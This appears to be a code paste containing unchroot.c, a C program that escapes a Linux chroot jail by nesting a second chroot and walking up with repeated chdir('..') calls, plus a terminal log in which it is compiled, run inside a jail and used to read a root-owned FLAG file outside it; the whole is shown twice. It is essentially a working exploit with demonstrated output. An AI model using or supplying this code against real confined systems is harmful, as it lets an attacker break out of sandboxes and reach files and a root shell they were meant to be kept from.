lager1 · January 17, 2025 17:26
diff --git a/unchroot.c b/unchroot.c
 #include <sys/stat.h>
 #include <unistd.h>
 #include <fcntl.h>

 int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);  
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");  
    return execl("/bin/sh", "-i", NULL);
 }
diff --git a/unchroot.txt b/unchroot.txt
 $ echo 1337 | sudo tee /FLAG
 1337
 $ mkdir chroot
 $ cd chroot/
 $ mkdir bin etc lib var home
 $ ln -s lib lib64
 $ ldd /bin/sh
    linux-vdso.so.1 =>  (0x00007fffa9c83000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a29106000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f9a294d8000)
 $ cp /bin/sh bin
 $ cp /lib/x86_64-linux-gnu/libc.so.6 lib
 $ cp /lib64/ld-linux-x86-64.so.2 lib
 $ tree
 .
 ├── bin
 │   └── sh
 ├── etc
 ├── home
 ├── lib
 │   ├── ld-linux-x86-64.so.2
 │   └── libc.so.6
 ├── lib64 -> lib
 └── var

 6 directories, 3 files
 $
 $ cat > unchroot.c
 #include <sys/stat.h>
 #include <unistd.h>

 int main() {
    mkdir(".42", 0755);
    chroot(".42");
    chroot("../../../../../../../../../../../../../../../..");
    return execl("/bin/sh", "-i", NULL);
 }
 $ gcc -static -o unchroot unchroot.c
 $
 $ sudo chroot . /bin/sh
 # ls
 /bin/sh: 1: ls: not found
 # ./unchroot
 # ls
 bin    dev   home            lib         media  proc  sbin     sys  var
 boot   etc   initrd.img      lib64       mnt    root  selinux  tmp  vmlinuz
 cdrom  FLAG  initrd.img.old  lost+found  opt    run   srv      usr  vmlinuz.old
 # cat FLAG
 1337
 #
	#include <sys/stat.h>
	#include <unistd.h>
	#include <fcntl.h>

	int main() {
	int dir_fd, x;
	setuid(0);
	mkdir(".42", 0755);
	dir_fd = open(".", O_RDONLY);
	chroot(".42");
	fchdir(dir_fd);
	close(dir_fd);
	for(x = 0; x < 1000; x++) chdir("..");
	chroot(".");
	return execl("/bin/sh", "-i", NULL);
	}
	$ echo 1337 \| sudo tee /FLAG
	1337
	$ mkdir chroot
	$ cd chroot/
	$ mkdir bin etc lib var home
	$ ln -s lib lib64
	$ ldd /bin/sh
	linux-vdso.so.1 => (0x00007fffa9c83000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a29106000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f9a294d8000)
	$ cp /bin/sh bin
	$ cp /lib/x86_64-linux-gnu/libc.so.6 lib
	$ cp /lib64/ld-linux-x86-64.so.2 lib
	$ tree
	.
	├── bin
	│ └── sh
	├── etc
	├── home
	├── lib
	│ ├── ld-linux-x86-64.so.2
	│ └── libc.so.6
	├── lib64 -> lib
	└── var

	6 directories, 3 files
	$
	$ cat > unchroot.c
	#include <sys/stat.h>
	#include <unistd.h>

	int main() {
	mkdir(".42", 0755);
	chroot(".42");
	chroot("../../../../../../../../../../../../../../../..");
	return execl("/bin/sh", "-i", NULL);
	}
	$ gcc -static -o unchroot unchroot.c
	$
	$ sudo chroot . /bin/sh
	# ls
	/bin/sh: 1: ls: not found
	# ./unchroot
	# ls
	bin dev home lib media proc sbin sys var
	boot etc initrd.img lib64 mnt root selinux tmp vmlinuz
	cdrom FLAG initrd.img.old lost+found opt run srv usr vmlinuz.old
	# cat FLAG
	1337
	#